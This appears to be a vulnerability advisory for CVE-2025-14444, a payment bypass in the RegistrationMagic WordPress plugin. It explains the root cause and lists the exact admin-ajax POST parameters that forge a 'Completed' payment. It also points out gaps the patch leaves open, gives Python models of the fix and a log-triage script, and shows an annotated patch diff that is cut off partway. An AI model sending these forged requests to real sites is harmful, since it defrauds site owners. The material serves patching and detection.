Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14444: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.6.9 – Unauthenticated Payment Bypass via rm_process_paypal_sdk_payment (custom-registration-form-builder-with-submission-manager)

Severity Medium (CVSS 5.3)
CWE 345
Vulnerable Version 6.0.6.9
Patched Version 6.0.7.0
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14444:
This vulnerability is an unauthenticated payment bypass in the RegistrationMagic WordPress plugin. The flaw resides in the PayPal SDK payment processing function, which trusted client-supplied payment status values without server-side verification. Attackers could manipulate these values to activate paid user accounts without completing a real PayPal transaction.

Root Cause:
The vulnerability existed in the `process_paypal_sdk_payment()` method within `/services/class_rm_paypal_service.php`. The function accepted a `transaction` array from AJAX requests and directly used the client-supplied `status` parameter (lines 321-351). The code extracted `$status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';`, normalised it with `ucfirst()`, and immediately wrote it to the payment log; when the value was `Completed` it went on to activate the account whose id arrived in `$_POST['user_id']`. The only request check was `check_ajax_referer('rm_ajax_secure','rm_sec_nonce')`, an AJAX nonce that the front-end payment flow must expose to visitors (the bypass is unauthenticated), not an authentication or capability check. No server-side validation occurred against PayPal's actual payment systems.

Exploitation:
Attackers could send POST requests to `/wp-admin/admin-ajax.php` with `action=rm_process_paypal_sdk_payment` and a valid `rm_sec_nonce` value. The payload required `transaction[status]=Completed`, `transaction[id]=any_value`, `submission_id` (an existing submission), `payment_id`, and `user_id` parameters. By setting the status to 'Completed', the plugin would mark the payment log entry as successful and, when the plugin's activation-on-payment setting is enabled, activate the user account named in `user_id`, bypassing PayPal's payment gateway entirely. Nothing tied `transaction[id]` to a real PayPal capture.

Patch Analysis:
The patch replaces the client-controlled status with server-side verification. The two lines that read `status` from the request were commented out, and a new `validate_sdk_payment()` method was added to the same service class. It obtains an OAuth token from PayPal's REST API using the stored client ID and secret key, fetches `/v2/payments/captures/{transaction id}`, and returns 'Completed' only when PayPal reports the capture as COMPLETED; any API failure, missing credentials, unknown id, or other status yields 'Pending'. The patch also adds a PayPal Secret Key field to the payment settings, a client-side requirement for it, and admin and front-end notices when it is missing. Two limits are visible in the diff: the verification compares status only, not the captured amount, currency, or any link between the capture and the submission, and `transaction[id]`, `payment_id` and `user_id` are still taken from the request, so a capture that PayPal reports as completed is accepted for whatever submission, log row and user the caller names.
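To make the three states concrete, here is an added example (written for this page, not code from the plugin or from Atomic Edge) that models the handler's decision in Python with an in-memory stand-in for PayPal's captures endpoint: the original client-trusted status, the 6.0.7.0 lookup-by-capture-id, and a stricter version that also checks the id shape, amount, currency, linkage to the submission and single use. The capture ids, amounts, the `custom_id` convention and the 17-character id format are assumptions made for the example.

```python
"""Added example, not code from RegistrationMagic or from the Atomic Edge page.

A minimal model of the rm_process_paypal_sdk_payment decision, in three forms:
  status_vulnerable  - <= 6.0.6.9: status copied from the request
  status_patched     - 6.0.7.0: status looked up at PayPal by capture id
  status_strict      - what a complete check adds: id shape, amount, currency,
                       binding to the submission, and single use
The PayPal REST API is replaced by a constructed in-memory table; the capture
id format and the use of custom_id to carry the submission id are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Capture:
    status: str       # PayPal capture status, e.g. COMPLETED / PENDING
    amount: str       # amount.value as PayPal returns it (a string)
    currency: str     # amount.currency_code
    custom_id: str    # assumption: set at order creation to "submission:<id>"


# Constructed stand-in for GET /v2/payments/captures/{id}
FAKE_PAYPAL = {
    "5O190127TN364715T": Capture("COMPLETED", "49.00", "USD", "submission:42"),
    "8XD7139PK0290432L": Capture("PENDING",   "49.00", "USD", "submission:43"),
    "2CK64103BU7123401": Capture("COMPLETED", "0.01",  "USD", "submission:99"),
}

# Assumption: capture ids are 17 uppercase alphanumerics. Anything else is
# rejected before it can reach the API URL path.
CAPTURE_ID_RE = re.compile(r"[A-Z0-9]{17}")


def paypal_get_capture(txn_id):
    """Returns the capture resource, or None (what a 404 collapses to)."""
    return FAKE_PAYPAL.get(txn_id)


def status_vulnerable(post):
    """<= 6.0.6.9: ucfirst(strtolower($transaction['status'])), default 'Pending'."""
    status = post.get("transaction", {}).get("status", "Pending")
    return status.lower().capitalize()


def status_patched(post):
    """6.0.7.0 validate_sdk_payment(): 'Completed' iff PayPal reports COMPLETED."""
    cap = paypal_get_capture(post.get("transaction", {}).get("id", ""))
    return "Completed" if cap is not None and cap.status == "COMPLETED" else "Pending"


def status_strict(post, expected_amount, expected_currency, submission_id, used_txn_ids):
    """Server-side check that also binds the capture to this submission.

    used_txn_ids is the set of capture ids already credited (in the plugin this
    would be a lookup in its PayPal log table); it is updated on success.
    """
    txn_id = post.get("transaction", {}).get("id", "")
    if not CAPTURE_ID_RE.fullmatch(txn_id):
        return "Pending"                      # never build an API URL from junk
    cap = paypal_get_capture(txn_id)
    if cap is None or cap.status != "COMPLETED":
        return "Pending"
    if (cap.amount, cap.currency) != (expected_amount, expected_currency):
        return "Pending"                      # paid, but not the right price
    if cap.custom_id != f"submission:{submission_id}":
        return "Pending"                      # paid for a different submission
    if txn_id in used_txn_ids:
        return "Pending"                      # replay of an already credited capture
    used_txn_ids.add(txn_id)
    return "Completed"


if __name__ == "__main__":
    forged = {"transaction": {"status": "Completed", "id": "any_value"}}
    replay = {"transaction": {"id": "2CK64103BU7123401"}}   # a real 0.01 USD capture
    real = {"transaction": {"id": "5O190127TN364715T"}}
    used = set()
    print("forged :", status_vulnerable(forged), status_patched(forged))
    print("replay :", status_patched(replay), status_strict(replay, "49.00", "USD", 42, used))
    print("real   :", status_strict(real, "49.00", "USD", 42, used),
          status_strict(real, "49.00", "USD", 42, used))
```

The forged request is the CVE: the vulnerable function reports Completed, the patched one Pending. The replay request shows what the patched check still accepts: a genuine 0.01 USD capture for some other submission passes the status-only lookup, and only the stricter version rejects it on amount and binding; submitting the correct capture a second time is rejected as a replay.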

Impact:
Successful exploitation allowed unauthenticated attackers to bypass paid registration requirements. Attackers could create activated user accounts without payment, potentially gaining access to premium content, paid memberships, or restricted areas. This could result in revenue loss for site owners and unauthorized access to paid features.
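A site that ran 6.0.6.9 or earlier with the modern PayPal button enabled cannot tell from a 'Completed' status alone whether money changed hands. The following added example (not from the page or the plugin) shows a retrospective triage of the plugin's PayPal log rows: the rows, column names and PayPal answers are constructed fixtures, the capture-id shape is a heuristic, and in practice the `lookup` argument would call PayPal's captures endpoint with the merchant's REST credentials.

```python
"""Added example, not part of the advisory or the plugin: triage stored PayPal
log rows on a site that ran RegistrationMagic <= 6.0.6.9.

Rows are constructed fixtures shaped like the columns the handler writes
(status, txn_id) plus a log id and user id; the real table and column names
are an assumption. PAYPAL_CAPTURES stands in for GET /v2/payments/captures/{id}.
"""
import re
from collections import Counter

# Heuristic (assumption): PayPal capture ids are 17 uppercase alphanumerics.
CAPTURE_ID_RE = re.compile(r"[A-Z0-9]{17}")

# Constructed: what PayPal reports for ids it knows.
PAYPAL_CAPTURES = {
    "5O190127TN364715T": "COMPLETED",
    "8XD7139PK0290432L": "PENDING",
}

# Constructed log rows as the vulnerable handler could have left them.
PAYPAL_LOGS = [
    {"log_id": 1, "user_id": 10, "status": "Completed", "txn_id": "5O190127TN364715T"},
    {"log_id": 2, "user_id": 11, "status": "Completed", "txn_id": "any_value"},
    {"log_id": 3, "user_id": 12, "status": "Completed", "txn_id": ""},
    {"log_id": 4, "user_id": 13, "status": "Completed", "txn_id": "8XD7139PK0290432L"},
    {"log_id": 5, "user_id": 14, "status": "Completed", "txn_id": "5O190127TN364715T"},
    {"log_id": 6, "user_id": 15, "status": "Pending",   "txn_id": ""},
]


def triage(rows, lookup=PAYPAL_CAPTURES.get):
    """Return {log_id: [reasons]} for Completed rows that PayPal cannot vouch for.

    lookup(txn_id) must return PayPal's capture status or None when unknown.
    """
    completed = [r for r in rows if r["status"] == "Completed"]
    seen = Counter(r["txn_id"] for r in completed)
    findings = {}
    for r in completed:
        reasons = []
        txn_id = r["txn_id"]
        if not txn_id:
            reasons.append("empty txn_id")
        elif not CAPTURE_ID_RE.fullmatch(txn_id):
            reasons.append("txn_id not shaped like a capture id")
        else:
            status = lookup(txn_id)
            if status is None:
                reasons.append("unknown at PayPal")
            elif status != "COMPLETED":
                reasons.append(f"PayPal status {status}")
            if seen[txn_id] > 1:
                reasons.append("capture id reused across log rows")
        if reasons:
            findings[r["log_id"]] = reasons
    return findings


def users_to_review(rows, lookup=PAYPAL_CAPTURES.get):
    """User ids whose activation rests on a flagged payment row."""
    flagged = triage(rows, lookup)
    return sorted({r["user_id"] for r in rows if r["log_id"] in flagged})


if __name__ == "__main__":
    for log_id, why in sorted(triage(PAYPAL_LOGS).items()):
        print(log_id, "; ".join(why))
    print("users to review:", users_to_review(PAYPAL_LOGS))
```

Rows flagged for reuse include the legitimate first use of the capture; both need review because the plugin's log does not say which submission the payment was for. Accounts in the review list should be deactivated or asked to pay again, not deleted, since some rows will be honest payments recorded through a broken flow.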

Differential between vulnerable and patched code

Code Diff
--- a/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
@@ -2336,8 +2336,6 @@

         }

-
-
         ?>

         <?php if($php_notice!=0): ?>
@@ -2354,20 +2352,6 @@

         <?php endif; ?>

-        <?php /* if($php_8_notice != 0 && isset($_GET['page']) && $_GET['page'] == 'rm_form_manage'):
-
-            if(version_compare(PHP_VERSION, '8.0.0', '>=')): ?>
-
-            <div id="rm-php-notice-warning" class="rm_admin_notice rm-notice-banner notice notice-warning is-dismissible">
-
-                <p><?php _e( 'You are using PHP 8. RegistrationMagic currently does not supports PHP 8 and you might see some unwanted errors or warnings. We are working on PHP 8 compatibility update and it will be available very soon.','custom-registration-form-builder-with-submission-manager'); ?> <a class="rm_dismiss" href="<?php echo esc_url($query_string).'rm_disable_php_8_notice=1' ?>"><?php _e('Dismiss','custom-registration-form-builder-with-submission-manager'); ?></a></p>
-
-            </div>
-
-            <?php endif;
-
-        endif; */ ?>
-
         <?php if($edd_notice!=0 &&  class_exists( 'Easy_Digital_Downloads')): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2378,8 +2362,6 @@

         <?php endif; ?>

-
-
         <?php if($wc_notice!=0 && class_exists( 'WooCommerce' )): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2390,6 +2372,18 @@

         <?php endif;

+        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+        $p_client_id = get_option('rm_option_paypal_client_id', '');
+        $p_client_secret = get_option('rm_option_paypal_secret_key', '');
+        if($modern_paypal && !empty($p_client_id) && empty($p_client_secret)): ?>
+            <div class="rm_admin_notice_banner rm-notice-banner notice notice-error">
+                <p style="vertical-align:middle;">
+                    <span style="color:#d63638;font-size:20px;" aria-hidden="true">⚠️</span>
+                    <?php echo wp_kses_post(sprintf(__( '<strong>Your PayPal Secret Key</strong> is required to receive payments with RegistrationMagic form submissions. Please <strong>update your PayPal Secret Key</strong> from the <a href="%s">Payment Settings</a> to continue receiving payments.','custom-registration-form-builder-with-submission-manager'), esc_url(admin_url('admin.php?page=rm_options_payment')))); ?>
+                </p>
+            </div>
+        <?php endif;
+
         if (function_exists('is_multisite') && is_multisite()) {
             $nl_subscribed = get_site_option('rm_option_newsletter_subbed', false);
         } else {
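Review bot: this banner is advisory only; nothing in this hunk or elsewhere in the patch stops the modern PayPal flow from running while `rm_option_paypal_secret_key` is empty, and in that state `validate_sdk_payment()` cannot obtain a token and returns 'Pending' for every genuine payment. The condition `!empty($p_client_id) && empty($p_client_secret)` also skips the case where both values are blank but `rm_option_paypal_modern_enable` is set. Consider refusing to render the modern PayPal button, or returning an error from the AJAX handler, until both credentials are present.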
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
@@ -374,37 +374,42 @@
         $setting_service= new RM_Setting_Service();
         $setting_service->set_model($model);
         if($this->mv_handler->validateForm("login-integrations")) {
-            $options= array();
-            if($data->type=='fb'){
-                $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
-                $options['facebook_app_id'] = $request->req['facebook_app_id'];
-                $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+            // Check nonce
+            if (!isset($request->req['social_login_nonce']) || !wp_verify_nonce($request->req['social_login_nonce'], 'social_login_nonce')) {
+                RM_PFBC_Form::setError('login-integrations', esc_html__('Nonce check failed. Please try again.', 'custom-registration-form-builder-with-submission-manager'));
+            } else {
+                $options= array();
+                if($data->type=='fb'){
+                    $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
+                    $options['facebook_app_id'] = $request->req['facebook_app_id'];
+                    $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+                }
+                else if($data->type=='inst'){
+                    $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
+                    $options['instagram_client_id'] = $request->req['instagram_client_id'];
+                    $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
+                }
+                else if($data->type=='win'){
+                    $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
+                    $options['windows_client_id'] = $request->req['windows_client_id'];
+                }
+                else if($data->type=='google'){
+                    $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
+                    $options['gplus_client_id'] = $request->req['gplus_client_id'];
+                }
+                else if($data->type=='tw'){
+                    $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
+                    $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
+                    $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
+                }
+                else if($data->type=='linked'){
+                    $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
+                    $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
+                    $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
+                }
+                $setting_service->save_options($options);
+                RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
             }
-            else if($data->type=='inst'){
-                $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
-                $options['instagram_client_id'] = $request->req['instagram_client_id'];
-                $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
-            }
-            else if($data->type=='win'){
-                $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
-                $options['windows_client_id'] = $request->req['windows_client_id'];
-            }
-            else if($data->type=='google'){
-                $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
-                $options['gplus_client_id'] = $request->req['gplus_client_id'];
-            }
-            else if($data->type=='tw'){
-                $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
-                $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
-                $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
-            }
-            else if($data->type=='linked'){
-                $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
-                $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
-                $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
-            }
-            $setting_service->save_options($options);
-            RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
         }
         $data->options = $setting_service->get_options();
         $view = $this->mv_handler->setView("login_integrations");
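Review bot: the nonce only addresses CSRF; this hunk shows no capability check (for example `current_user_can('manage_options')`) before `$setting_service->save_options($options)`, so confirm the controller is reachable only by administrators. The secrets (`facebook_app_secret`, `instagram_client_secret`, `tw_consumer_secret`, `linkedin_secret_key`) are copied from `$request->req` without `sanitize_text_field()`. The `inst` branch is kept here even though the Instagram button and login callback are commented out elsewhere in this patch.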
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
@@ -446,6 +446,7 @@
             $options_pp_pstyle = array("id" => "rm_pp_style_tb", "value" => $data['paypal_page_style'], "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_PAGESTYLE'));
             $options_pp_modern_enable = array("id"=> "rm_pp_modern_enable", "onclick" => "enable_paypal_modern_popup(this)", "value" => isset($data['paypal_modern_enable']) ? $data['paypal_modern_enable'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_MODERN'));
             $options_pp_client_id = array("id"=> "rm_pp_modern_client_id", "value" => isset($data['paypal_client_id']) ? $data['paypal_client_id'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_CLIENT_ID'));
+            $options_pp_secret_key = array("id"=> "rm_pp_modern_secret_key", "value" => isset($data['paypal_secret_key']) ? $data['paypal_secret_key'] : '',"longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_SECRET_KEY'));
             $image_dir = plugin_dir_url(dirname(dirname(__FILE__))) . "images";
             $layout_checked_state = array('gold' => null, 'blue' => null, 'silver' => null, 'white'=> null, 'black'=> null);
             $selected_layout = isset($data['paypal_btn_color']) ? $data['paypal_btn_color'] : 'gold';
@@ -504,6 +505,8 @@
                                             new Element_HTML('<div class="childfieldsrow" id="rm_pp_modern_enable_childfieldsrow" style="'.$enable_modern_paypal.'">'),
                                             new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_CLIENT_ID'), "paypal_client_id", $options_pp_client_id),
                                             new Element_HTML("<span id='rm_pp_modern_client_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Client ID is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
+                                            new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_SECRET_KEY'), "paypal_secret_key", $options_pp_secret_key),
+                                            new Element_HTML("<span id='rm_pp_modern_secret_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Secret Key is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
                                             new Element_HTML($paypal_btn_colorhtml),
                                             new Element_HTML('</div>')
                                             ),
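Review bot: `Element_Textbox` for `paypal_secret_key` with `"value" => $data['paypal_secret_key']` echoes the stored REST secret back into the page as a plain text input, so anyone who can view the payment settings (or a screenshot, or browser autofill) reads the credential. Use a password-type input, do not pre-populate it from the stored value (show a "secret is set" indicator instead), and make sure the save path does not overwrite an existing secret when the field is submitted empty.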
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
@@ -20,6 +20,9 @@
             "prevent" => array("bootstrap", "jQuery"),
             "action" => ""
         ));
+
+        // Nonce
+        $form->addElement(new Element_Hidden("social_login_nonce", wp_create_nonce("social_login_nonce")));

         if($type=='fb'){
             if(RM_Utilities::is_ssl()){
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
@@ -217,11 +217,17 @@
                 if(jQuery("input#rm_pp_modern_client_id").val().trim() == '') {
                     jQuery("input#rm_pp_modern_client_id").focus();
                     jQuery('span#rm_pp_modern_client_error_msg').show();
-
                     var rmErrorMsg = jQuery('span#rm_pp_modern_client_error_msg');
                     rmErrorMsg.insertAfter('#rm_pp_modern_client_id');
                     return;
                 }
+                if(jQuery("input#rm_pp_modern_secret_key").val().trim() == '') {
+                    jQuery("input#rm_pp_modern_secret_key").focus();
+                    jQuery('span#rm_pp_modern_secret_error_msg').show();
+                    var rmErrorMsg = jQuery('span#rm_pp_modern_secret_error_msg');
+                    rmErrorMsg.insertAfter('#rm_pp_modern_secret_key');
+                    return;
+                }
             } else if (jQuery("input#rm_pp_email_tb").val().trim() == '') {
                 jQuery("input#rm_pp_email_tb").focus();
                 jQuery('span#rm_pp_email_error_msg').show();
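Review bot: requiring `rm_pp_modern_secret_key` here enforces it only in the browser; a direct POST to the options save handler can still store a client ID with an empty secret, which is exactly the state the new admin notice warns about. The same requirement belongs server-side in `class_rm_options_controller.php`.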
@@ -297,6 +303,11 @@
                 jQuery('span#rm_pp_modern_client_error_msg').hide();
             }
         });
+        jQuery("input#rm_pp_modern_secret_key").on('keyup', function() {
+            if(jQuery(this).val() != '') {
+                jQuery('span#rm_pp_modern_secret_error_msg').hide();
+            }
+        });

         jQuery("input#rm_pp_email_tb").on('keyup', function() {
             if(jQuery(this).val() != '') {
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
@@ -4557,7 +4557,7 @@
             case 'LABEL_PAYPAL_CLIENT_ID':
                 return __('PayPal Client ID', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_CLIENT_ID':
-                return __('Client ID can be obtained from PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
+                return __('Client ID can be obtained from your PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
             case 'LABEL_OPTIONS_PAYPAL_BTN_COLOR':
                 return __('Button Color', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PAYPAL_BTN_COLOR':
@@ -4800,7 +4800,7 @@
             case 'LABEL_PAYPAL_SECRET_KEY':
                 return __("PayPal Secret Key", 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_SECRET_KEY':
-                return __("Secret key is required only when form has subscription field.", 'custom-registration-form-builder-with-submission-manager');
+                return __("Secret key can be obtained from your PayPal dashboard.", 'custom-registration-form-builder-with-submission-manager');
             case 'FIELD_HELP_TEXT_SUBSCRIPTION_Not_Installed_Resctriction':
                 return __("RegistrationMagic Subscriptions Addons is required for this field to work. Please install and activate the RegistrationMagic Subscriptions Addons plugin.", 'custom-registration-form-builder-with-submission-manager');

--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
@@ -2285,13 +2285,14 @@
                     echo "<select " . $this->print_attributes($attributes) . " >";
                     foreach(RM_Utilities_Revamp::get_countries() as $ccode => $country) {
                         $ccode = strtolower(preg_replace('/.*[(.*)].*/', '$1', $ccode));
-                        if (isset($meta_value['country']) && $meta_value['country'] == $country) {
-                            $attributes['checked'] = 'checked';
-                        }
                         if(empty($ccode)) {
                             echo "<option value="">".esc_html($country)."</option>";
                         } else {
-                            echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                            } else {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            }
                         }
                     }
                     echo "</select>";
@@ -2416,7 +2417,11 @@
                             if(empty($code)) {
                                 echo "<option value="">".esc_html($country)."</option>";
                             } else {
-                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                                } else {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                }
                             }
                         }
                         echo "</select>";
--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
@@ -2005,6 +2005,17 @@
                                     }
                                     echo "<label for='rm_gateway_".wp_kses_post((string)$gateway)."'>".wp_kses_post($pay_procs_options[$gateway])."</label>";
                                     echo "</div>";
+                                    if ($gateway === 'paypal') {
+                                        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+                                        $client_id = get_option('rm_option_paypal_client_id', '');
+                                        $client_secret = get_option('rm_option_paypal_secret_key', '');
+                                        if ($modern_paypal && !empty($client_id) && empty($client_secret)) {
+                                            echo "<div class='rm-paypal-modern-notice' style='background:#fff3cd;color:#856404;border:1px solid #ffeeba;padding:12px 16px;margin:10px 0;border-radius:4px;display:flex;align-items:center;font-weight:500;font-size:15px;'>"
+                                                ."<span style='margin-right:10px;display:inline-flex;align-items:center;'><svg xmlns='http://www.w3.org/2000/svg' width='20' height='20' fill='none' viewBox='0 0 24 24'><circle cx='12' cy='12' r='10' fill='#ff0000ff'/><path d='M12 8v4m0 4h.01' stroke='#ffffffff' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'/></svg></span>"
+                                                .esc_html__('PayPal payment gateway isn't fully configured. Payments may not get updated correctly. Please contact site administrator to resolve this issue.', 'custom-registration-form-builder-with-submission-manager')
+                                                ."</div>";
+                                        }
+                                    }
                                 }
                             }
                             if(isset($form->form_options->show_total_price[0]) && $form->form_options->show_total_price[0] == 1) {
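Review bot: the literal passed to `esc_html__()` contains an unescaped apostrophe (`isn't`) inside a single-quoted PHP string; if the backslash was only lost in rendering, ignore this, otherwise it is a parse error on every form that lists the PayPal gateway. Separately, this banner tells every unauthenticated visitor that the site's PayPal integration is misconfigured; the admin notice added in `class_rm_admin.php` is the right audience, and the public message should be neutral (payments temporarily unavailable) rather than describing the missing credential.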
@@ -2687,7 +2698,7 @@
         ));
     }

-    private static function is_username_reserved($username_to_check) {
+    private function is_username_reserved($username_to_check) {
         if(empty($username_to_check))
             return false;

@@ -2702,7 +2713,7 @@
             return false;
     }

-    private static function show_subscription_checkboxes($form = null) {
+    private function show_subscription_checkboxes($form = null) {
         if(get_option('rm_option_enable_mailchimp') == 'yes' && $form->form_options->form_is_opt_in_checkbox == 1 && (isset($form->form_options->enable_mailchimp[0]) && $form->form_options->enable_mailchimp[0] == 1)) {
             //This outer div is added so that the optin text can be made full width by CSS.
             echo '<div class="rm_optin_text rm-subscription-wrap">';
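Review bot: `show_subscription_checkboxes($form = null)` dereferences `$form->form_options` unconditionally, so the `null` default is a guaranteed fatal error; drop the default or return early when `$form` is null. The change from `private static` to an instance method here (and for `is_username_reserved()` in the previous hunk) breaks any remaining `self::` call; the diff does not show call sites being updated, so confirm they all use `$this->`.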
--- a/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
+++ b/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
@@ -251,7 +251,7 @@
                             echo html_entity_decode(wp_kses((string)$data->linkedin_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->windows_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->twitter_html,RM_Utilities::expanded_allowed_tags()));
-                            echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
+                            //echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
                         }
                     ?>
                     </div>
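Review bot: commenting out the Instagram button here leaves the `inst` settings branch in `class_rm_login_manage_controller.php` and the stored `instagram_client_id`/`instagram_client_secret` options in place. If the provider is being dropped, remove the option handling as well and consider clearing the stored credentials on upgrade rather than leaving dead secrets in the options table.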
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
  * Plugin Name:       RegistrationMagic
  * Plugin URI:        http://www.registrationmagic.com
  * Description:       A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version:           6.0.6.9
+ * Version:           6.0.7.0
  * Tags:              registration, form, custom, analytics, simple, submissions
  * Requires at least: 5.2.0
  * Requires PHP:      7.2
@@ -78,7 +78,7 @@
 */
 if(!defined('RM_PLUGIN_VERSION')) {
     define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
-    define('RM_PLUGIN_VERSION', '6.0.6.9');
+    define('RM_PLUGIN_VERSION', '6.0.7.0');
     define('RM_DB_VERSION', 5.9);
     define('RM_SHOW_WHATSNEW_SPLASH', false);  //Set it to 'false' to disable whatsnew screen.
     //define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
@@ -264,12 +264,6 @@

     register_activation_hook(__FILE__, 'RM_Activator::activate');
     register_deactivation_hook(__FILE__, 'RM_Deactivator::deactivate');
-    add_filter( 'auto_update_plugin', function( $update, $item ) {
-        if ( $item->plugin === RM_PLUGIN_BASENAME ) {
-            return false;
-        }
-        return $update;
-    }, 10, 2 );

     //Set up update check
     $rm_form_diary = array();
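Review bot: the removed filter returned `false` from `auto_update_plugin` for this plugin, so sites on 6.0.6.9 and earlier will not receive 6.0.7.0 through WordPress auto-updates even where they are enabled; the release notes should say that this update must be applied manually. Removing the filter is the right call for a security fix.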
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
@@ -321,23 +321,23 @@
         return $data; //We do not want form redirect to work in case paypal processing is going on.
     }

-    public function process_paypal_sdk_payment(){
-
+    public function process_paypal_sdk_payment() {
         if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
-            if(!isset($_POST['transaction'])|| !is_array($_POST['transaction']) ){
+            if(!isset($_POST['transaction']) || !is_array($_POST['transaction']) ) {
                 wp_send_json_error(array('msg'=>__('Transaction not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $submission_id= isset($_POST['submission_id']) ? absint($_POST['submission_id']) : 0;
             empty($submission_id) ? wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager'))) : '';
